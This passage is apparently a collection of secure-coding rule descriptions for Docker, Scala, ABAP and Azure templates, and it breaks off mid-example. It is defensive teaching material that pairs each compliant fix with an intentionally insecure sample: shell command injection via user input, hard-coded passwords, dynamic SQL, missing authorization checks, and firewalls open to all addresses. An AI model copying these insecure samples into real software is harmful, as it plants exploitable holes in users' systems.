Sensitive Code Example

# syntax=docker/dockerfile:1.3
FROM example
# Sensitive
RUN --network=host wget -O /home/sessions http://127.0.0.1:9000/sessions

Compliant Solution

# syntax=docker/dockerfile:1.3
FROM example
RUN --network=none wget -O /home/sessions http://127.0.0.1:9000/sessions

See

docker:S6470

When building a Docker image from a Dockerfile, a context directory is used and sent to the Docker daemon before the actual build starts. This context directory usually contains the Dockerfile itself, along with all the files that will be necessary for the build to succeed. This generally includes:

  • the source code of applications to set up in the container.
  • configuration files for other software components.
  • other necessary packages or components.

The COPY and ADD directives in the Dockerfiles are then used to actually copy content from the context directory to the image file system.

When COPY or ADD are used to recursively copy entire top-level directories or multiple items whose names are determined at build time, unexpected files might get copied to the image filesystem. This can compromise the confidentiality of those files.

Ask Yourself Whether

  • The copied files and directories might contain sensitive data that should be kept confidential.
  • The context directory contains files and directories that have no functional purpose for the final container image.

There is a risk if you answered yes to any of those questions.

Keep in mind that the content of the context directory might change depending on the build environment and over time.

Recommended Secure Coding Practices

  • Limit the usage of globbing in the COPY and ADD sources definition.
  • Avoid copying the entire context directory to the image filesystem.
  • Prefer providing an explicit list of files and directories that are required for the image to properly run.
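
The globbing pitfall can be sketched with Python's glob module (Dockerfile COPY globbing is not identical to shell globbing, and the file names here are hypothetical): a pattern like example* silently matches any stray file that happens to share the prefix.

```python
import glob
import os
import tempfile

# Build a scratch "context directory" containing an unintended file that a
# glob such as "example*" would silently pick up.
ctx = tempfile.mkdtemp()
for name in ("example1", "example2", "example1.bak"):  # .bak is unintended
    open(os.path.join(ctx, name), "w").close()

matched = sorted(os.path.basename(p)
                 for p in glob.glob(os.path.join(ctx, "example*")))
# The stray backup file is matched alongside the intended sources.
assert matched == ["example1", "example1.bak", "example2"]

# An explicit list, as in the compliant solution below, avoids the stray copy:
wanted = ["example1", "example2"]
assert "example1.bak" not in wanted
```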

Sensitive Code Example

Copying the complete context directory:

FROM ubuntu:22.04
# Sensitive
COPY . .
CMD /run.sh

Copying multiple files and directories whose names are expanded at build time:

FROM ubuntu:22.04
# Sensitive
COPY ./example* /
COPY ./run.sh /
CMD /run.sh

Compliant Solution

FROM ubuntu:22.04
COPY ./example1 /example1
COPY ./example2 /example2
COPY ./run.sh /
CMD /run.sh

See

scala:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It is misleading to use the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but when an IP address is hardcoded, fixing the issue takes more time, which increases the attack's impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don't hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

val ip = "192.168.12.42" // Sensitive
val socket = new Socket(ip, 6667)

Compliant Solution

val ips = Source.fromFile(configuration_file).getLines.toList // Compliant
val socket = new Socket(ips(0), 6667)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849
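
The exception list above can be approximated with Python's ipaddress module (a rough sketch for illustration, not the analyzer's actual logic; the OID-like 2.5.<number>.<number> pattern is omitted):

```python
import ipaddress

def is_exempt(ip: str) -> bool:
    """Rough sketch of the rule's exception list."""
    addr = ipaddress.ip_address(ip)
    if str(addr) in ("255.255.255.255", "0.0.0.0"):
        return True  # broadcast / non-routable
    exempt_nets = [
        ipaddress.ip_network("127.0.0.0/8"),      # loopback
        ipaddress.ip_network("192.0.2.0/24"),     # RFC 5737 documentation
        ipaddress.ip_network("198.51.100.0/24"),  # RFC 5737 documentation
        ipaddress.ip_network("203.0.113.0/24"),   # RFC 5737 documentation
        ipaddress.ip_network("2001:db8::/32"),    # RFC 3849 documentation
    ]
    return any(addr in net for net in exempt_nets)

assert is_exempt("127.0.0.1")
assert is_exempt("203.0.113.7")
assert not is_exempt("192.168.12.42")  # the sensitive example above is flagged
```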

See

scala:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.
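
The environment-based approach can be sketched in Python (illustrative only; the DB_PASSWORD variable name is hypothetical, and in a real deployment it would be set by the container runtime or CI secret store rather than in the script itself):

```python
import os

# Set here only so the sketch is self-contained; normally the deployment
# environment provides this value and no credential literal ships in code.
os.environ["DB_PASSWORD"] = "example-only"

# Read the credential from the environment and fail fast when it is absent.
password = os.environ.get("DB_PASSWORD")
if password is None:
    raise RuntimeError("DB_PASSWORD is not configured")
```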

See

abap:S4721

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process; indeed, shell meta-characters can be used (for instance, when parameters are user-controlled) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

CALL 'SYSTEM' ID 'COMMAND' FIELD usr_input ID 'TAB' FIELD TAB1.  " Sensitive

Compliant Solution

CALL 'SYSTEM' ID 'COMMAND' FIELD "/usr/bin/file.exe" ID 'TAB' FIELD TAB1.  " Compliant

See

abap:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

DATA: password(10) VALUE 'secret123',
      pwd(10) VALUE 'secret123'.

See

abap:S1493

There are two main reasons to ban dynamic clauses in SELECT statements.

The first relates to maintainability. One of the nice features of ABAP Design Time is the connection to the data dictionary; you get syntax errors if you try to address table fields that are not present anymore or that have typos. With dynamic SQL, the ability to statically check the code for this type of error is lost.

The other more critical reason relates to security. By definition, dynamic clauses make an application susceptible to SQL injection attacks.

Ask Yourself Whether

  • The SQL statement can be written without dynamic clauses.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Do not use dynamic clauses in "SELECT" statements.

Sensitive Code Example

SELECT (select_clause)
 FROM (from_clause) CLIENT SPECIFIED INTO <fs>
 WHERE (where_clause)
 GROUP BY (groupby_clause) HAVING (having_clause)
 ORDER BY (orderby_clause).

Compliant Solution

SELECT *
 FROM db_persons INTO us_persons
 WHERE country IS 'US'.

See

abap:S1492

Although the WHERE condition is optional in a SELECT statement, for performance and security reasons, a WHERE clause should always be specified to prevent reading the whole table.

Ask Yourself Whether

  • The whole table is not required.
  • The table contains sensitive information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Add a "WHERE" condition to "SELECT" statements.

Sensitive Code Example

SELECT * FROM db_persons INTO us_persons.

Compliant Solution

SELECT * FROM db_persons INTO us_persons WHERE country IS 'US'.

Exceptions

SELECT SINGLE and UP TO 1 ROWS result in only one record being read, so such SELECTs are ignored by this rule.

SELECT SINGLE * FROM db_persons INTO us_persons.

SELECT * FROM db_persons UP TO 1 ROWS INTO us_persons.

abap:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It is misleading to use the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but when an IP address is hardcoded, fixing the issue takes more time, which increases the attack's impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don't hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

DATA: ip TYPE string VALUE '192.168.12.42'.

Compliant Solution

READ DATASET file INTO ip MAXIMUM LENGTH len.

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

abap:S5117

Why is this an issue?

Every AUTHORITY-CHECK statement sets the field SY-SUBRC (also accessible as SYST-SUBRC) to the result of the authorization check. The SY-SUBRC value should therefore be checked immediately after every AUTHORITY-CHECK statement.

Noncompliant code example

AUTHORITY-CHECK OBJECT 'S_MYOBJ' "Noncompliant
    ID 'ID1' FIELD myvalue.

Compliant solution

AUTHORITY-CHECK OBJECT 'S_MYOBJ'  "Compliant
    ID 'ID1' FIELD myvalue.

  IF sy-subrc <> 0.
    MESSAGE 'NOT AUTHORIZED' TYPE 'E'.
  ENDIF.

Exceptions

No issue will be raised in the following cases:

  • One or more WRITE operations are performed between the AUTHORITY-CHECK statement and the SY-SUBRC check. An issue will however be raised if the WRITE operation is a WRITE ... TO statement, as this sets SY-SUBRC again.
  • SY-SUBRC's value is assigned to a variable. We then assume that it will be checked later.

AUTHORITY-CHECK OBJECT 'S_MYOBJ'  "Compliant
    ID 'ID1' FIELD myvalue.
WRITE 'Test'. " WRITE is accepted before checking SY-SUBRC
IF SY-SUBRC <> 0.
    EXIT.
ENDIF.

AUTHORITY-CHECK OBJECT 'S_MYOBJ'  "Compliant
    ID 'ID1' FIELD myvalue.
Tmp = SY-SUBRC. " Assigning SY-SUBRC value to a variable. We assume that it will be checked later.
IF Tmp <> 0.
    EXIT.
ENDIF.

abap:S1674

Why is this an issue?

Leaving a CATCH block empty means that the exception in question is neither handled nor passed forward to callers for handling at a higher level. Suppressing errors rather than handling them could lead to unpredictable system behavior and should be avoided.

Noncompliant code example

  try.
    if ABS( NUMBER ) > 100.
      write / 'Number is large'.
    endif.
    catch CX_SY_ARITHMETIC_ERROR into OREF.
  endtry.

Compliant solution

  try.
    if ABS( NUMBER ) > 100.
      write / 'Number is large'.
    endif.
  catch CX_SY_ARITHMETIC_ERROR into OREF.
    write / OREF->GET_TEXT( ).
  endtry.

Exceptions

When a block contains a comment, it is not considered to be empty.

Resources

  • MITRE, CWE-391 - Unchecked Error Condition
  • OWASP Top 10 2017 Category A10 - Insufficient Logging & Monitoring

abap:S5115

Why is this an issue?

Checking logged users' permissions by comparing their name to a hardcoded string can create security vulnerabilities. It prevents system administrators from changing users' permissions when needed (example: when their account has been compromised). Thus system fields SY-UNAME and SYST-UNAME should not be compared to hardcoded strings. Use instead AUTHORITY-CHECK to check users' permissions.

This rule raises an issue when either of the system fields SY-UNAME or SYST-UNAME are compared to a hardcoded value in a CASE statement or using one of the following operators: =, EQ, <>, NE.

Noncompliant code example

IF SY-UNAME = 'ALICE'. " Noncompliant
ENDIF.

CASE SY-UNAME.
WHEN 'A'. " Noncompliant
ENDCASE.

Compliant solution

AUTHORITY-CHECK OBJECT 'S_CARRID'
  ID 'CARRID' FIELD mycarrid.
IF sy-subrc <> 0.
  MESSAGE 'Not authorized' TYPE 'E'.
ENDIF.

abap:S1486

Why is this an issue?

A BREAK-POINT statement is used when debugging an application with the help of the ABAP Debugger. Such debugging statements can make an application vulnerable to attackers and should not be left in the source code.

Noncompliant code example

IF wv_parallel EQ 'X'.
  BREAK-POINT.
  WAIT UNTIL g_nb_return EQ wv_nb_call.
ENDIF.

Compliant solution

IF wv_parallel EQ 'X'.
  WAIT UNTIL g_nb_return EQ wv_nb_call.
ENDIF.

Resources

abap:S2809

Using "CALL TRANSACTION" statements without an authority check is security-sensitive. Access to the called transaction should be restricted to specific users.

This rule raises an issue when a CALL TRANSACTION has no explicit authorization check, i.e. when:

  • the CALL TRANSACTION statement is not followed by WITH AUTHORITY-CHECK.
  • the CALL TRANSACTION statement is not preceded by an AUTHORITY-CHECK statement.
  • the CALL TRANSACTION statement is not preceded by a call to the AUTHORITY_CHECK_TCODE function.

Ask Yourself Whether

  • the CALL TRANSACTION statement is restricted to the right users.

There is a risk if you answered no to this question.

Recommended Secure Coding Practices

Check current user’s authorization before every CALL TRANSACTION statement. Since ABAP 7.4 this should be done by appending WITH AUTHORITY-CHECK to CALL TRANSACTION statements. In earlier versions the AUTHORITY-CHECK statement or a call to the AUTHORITY_CHECK_TCODE function can be used.

Note that since ABAP 7.4 any CALL TRANSACTION statement not followed by WITH AUTHORITY-CHECK or WITHOUT AUTHORITY-CHECK is obsolete.

Sensitive Code Example

CALL TRANSACTION 'MY_DIALOG'.  " Sensitive as there is no apparent authorization check. It is also obsolete since ABAP 7.4.

Compliant Solution

AUTHORITY-CHECK OBJECT 'S_DIAGID'
                  ID 'ACTVT' FIELD '03'.
IF sy-subrc <> 0.
  " show an error message...
ENDIF.

CALL TRANSACTION 'MY_DIALOG'. " Ok but obsolete since ABAP 7.4.

or

CALL FUNCTION 'AUTHORITY_CHECK_TCODE'
  exporting
    tcode  = up_fdta
  exceptions
    ok     = 0
    others = 4.
IF sy-subrc <> 0.
  " show an error message...
ENDIF.

CALL TRANSACTION up_fdta USING up_bdc mode 'E'. " Ok but obsolete since ABAP 7.4.

or

CALL TRANSACTION 'MY_DIALOG' WITH AUTHORITY-CHECK. " Recommended way since ABAP 7.4.

Exceptions

No issue will be raised when CALL TRANSACTION is followed by WITHOUT AUTHORITY-CHECK as it explicitly says that the TRANSACTION does not require an authorization check.

See

abap:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

This rule raises an issue when the MD5_CALCULATE_HASH_FOR_RAW or MD5_CALCULATE_HASH_FOR_CHAR functions are used.

See

azureresourcemanager:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Databases

Code examples

The following code samples are equivalent for Azure Database for MySQL servers, Azure Database for PostgreSQL servers, and Azure Database for MariaDB servers.

For all of these, there is no minimal TLS version enforced by default.

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "name": "example",
      "properties": {
        "minimalTlsVersion": "TLS1_0"
      }
    }
  ]
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "name": "example",
      "properties": {
        "minimalTlsVersion": "TLS1_2"
      }
    }
  ]
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback is that an outdated framework's TLS v1.2 settings may still enable older cipher suites that have since been deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
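The same principle applies on the client side: most frameworks let you pin a minimum protocol version. As an illustrative sketch using the Python standard-library ssl module (not specific to Azure):

```python
import ssl

# Build a client context and refuse anything older than TLS 1.2.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2

# Handshakes over TLS 1.0/1.1 now fail with an SSL error,
# while TLS 1.2 and TLS 1.3 peers are still accepted.
```

With this context, connections negotiated below TLS 1.2 are rejected during the handshake instead of silently falling back to a weaker protocol.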

Resources

Articles & blog posts

Standards

azureresourcemanager:S6656

When using nested deployments in Azure, template expressions can be evaluated within the scope of the parent template or the scope of the nested template. If such a template expression evaluates a secure value of the parent template, it is possible to expose this value in the deployment history.

Why is this an issue?

Parameters with the type securestring and secureObject are designed to pass sensitive data to the resources being deployed. Secure parameters cannot be accessed after the deployment is completed: they can neither be logged nor used as an output.

When used in nested deployments, however, it is possible to embed secure parameters in such a way that they remain visible afterward.

What is the potential impact?

If the nested deployment contains a secure parameter in this way, then the value of this parameter may be readable in the deployment history. This can lead to important credentials being leaked to unauthorized accounts.

How to fix it in ARM Templates

By setting properties.expressionEvaluationOptions.scope to Inner in the parent template, template evaluations are limited to the scope of the nested template. This makes it impossible to expose secure parameters defined in the parent template.

Code examples

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "adminUsername": {
      "type": "securestring",
      "defaultValue": "[newGuid()]"
    }
  },
  "resources": [
    {
      "type": "Microsoft.Resources/deployments",
      "apiVersion": "2022-09-01",
      "properties": {
        "mode": "Incremental",
        "template": {
          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
          "contentVersion": "1.0.0.0",
          "resources": [
            {
              "type": "Microsoft.Compute/virtualMachines",
              "apiVersion": "2022-11-01",
              "properties": {
                "osProfile": {
                  "adminUsername": "[parameters('adminUsername')]"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Resources/deployments",
      "apiVersion": "2022-09-01",
      "properties": {
        "expressionEvaluationOptions": {
          "scope": "Inner"
        },
        "mode": "Incremental",
        "template": {
          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
          "contentVersion": "1.0.0.0",
          "parameters": {
            "adminUsername": {
              "type": "securestring",
              "defaultValue": "[newGuid()]"
            }
          },
          "resources": [
            {
              "type": "Microsoft.Compute/virtualMachines",
              "apiVersion": "2022-11-01",
              "properties": {
                "osProfile": {
                  "adminUsername": "[parameters('adminUsername')]"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Resources

Documentation

Standards

  • MITRE, CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
  • MITRE, CWE-532 - Insertion of Sensitive Information into Log File
azureresourcemanager:S6648

Azure Resource Manager templates define parameters as a way to reuse templates in different environments. Secure parameters (secure strings and secure objects) should not be assigned a default value.

Why is this an issue?

Parameters with the type securestring and secureObject are designed to pass sensitive data to the resources being deployed. Unlike other data types, they cannot be accessed after the deployment is completed. They can neither be logged nor used as an output.

Secure parameters can be assigned a default value which will be used if the parameter is not supplied. This default value is not protected and is stored in cleartext in the deployment history.

What is the potential impact?

If the default value contains a secret, it will be disclosed to all accounts that have read access to the deployment history.

How to fix it in ARM templates

Code examples

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "secretValue": {
      "type": "securestring",
      "defaultValue": "S3CR3T"
    }
  }
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "secretValue": {
      "type": "securestring"
    }
  }
}
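This pattern can also be spotted mechanically before deployment. A minimal sketch in plain Python (a hypothetical helper, not part of SonarQube or any official Azure tooling) that scans a template's parameters for secure types carrying a default value:

```python
import json

def insecure_defaults(template: dict) -> list[str]:
    """Return names of secure parameters that carry a default value."""
    findings = []
    for name, param in template.get("parameters", {}).items():
        is_secure = param.get("type", "").lower() in ("securestring", "secureobject")
        if is_secure and "defaultValue" in param:
            findings.append(name)
    return findings

template = json.loads("""
{
  "parameters": {
    "secretValue": {"type": "securestring", "defaultValue": "S3CR3T"},
    "region":      {"type": "string", "defaultValue": "westeurope"}
  }
}
""")
print(insecure_defaults(template))  # ['secretValue']
```

Note that the check is intentionally strict: any default on a secure parameter is flagged, since even a generated value like [newGuid()] ends up in the deployment history in cleartext.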

Resources

Documentation

Standards

  • MITRE, CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
  • MITRE, CWE-532 - Insertion of Sensitive Information into Log File
azureresourcemanager:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

Using publicNetworkAccess to control access to resources:

resource exampleSite "Microsoft.Web/sites@2020-12-01" {
  name: 'example-site'
  properties: {
    publicNetworkAccess: 'Enabled'
  }
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example-site",
      "properties": {
        "siteConfig": {
          "publicNetworkAccess": "Enabled"
        }
      }
    }
  ]
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example",
      "resources": [
        {
          "type": "config",
          "apiVersion": "2020-12-01",
          "name": "example-config",
          "properties": {
            "publicNetworkAccess": "Enabled"
          }
        }
      ]
    }
  ]
}

Using IP address ranges to control access to resources:

resource exampleFirewall "Microsoft.Sql/servers/firewallRules@2014-04-01" {
  name: 'example-firewall'
  properties: {
    startIpAddress: '0.0.0.0'
    endIpAddress: '255.255.255.255'
  }
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/firewallRules",
      "apiVersion": "2014-04-01",
      "name": "example-firewall",
      "properties": {
        "startIpAddress": "0.0.0.0",
        "endIpAddress": "255.255.255.255"
      }
    }
  ]
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers",
      "apiVersion": "2014-04-01",
      "name": "example-database",
      "resources": [
        {
          "type": "firewallRules",
          "apiVersion": "2014-04-01",
          "name": "example-firewall",
          "properties": {
            "startIpAddress": "0.0.0.0",
            "endIpAddress": "255.255.255.255"
          }
        }
      ]
    }
  ]
}

Compliant Solution

Using publicNetworkAccess to control access to resources:

resource exampleSite "Microsoft.Web/sites@2020-12-01" {
  name: 'example-site'
  properties: {
    publicNetworkAccess: 'Disabled'
  }
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example-site",
      "properties": {
        "siteConfig": {
          "publicNetworkAccess": "Disabled"
        }
      }
    }
  ]
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2020-12-01",
      "name": "example-site",
      "resources": [
        {
          "type": "config",
          "apiVersion": "2020-12-01",
          "name": "example-config",
          "properties": {
            "publicNetworkAccess": "Disabled"
          }
        }
      ]
    }
  ]
}

Using IP address ranges to control access to resources:

resource exampleFirewall "Microsoft.Sql/servers/firewallRules@2014-04-01" {
  name: 'example-firewall'
  properties: {
    startIpAddress: '192.168.0.0'
    endIpAddress: '192.168.255.255'
  }
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/firewallRules",
      "apiVersion": "2014-04-01",
      "name": "example-firewall",
      "properties": {
        "startIpAddress": "192.168.0.0",
        "endIpAddress": "192.168.255.255"
      }
    }
  ]
}

{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers",
      "apiVersion": "2014-04-01",
      "name": "example-database",
      "resources": [
        {
          "type": "firewallRules",
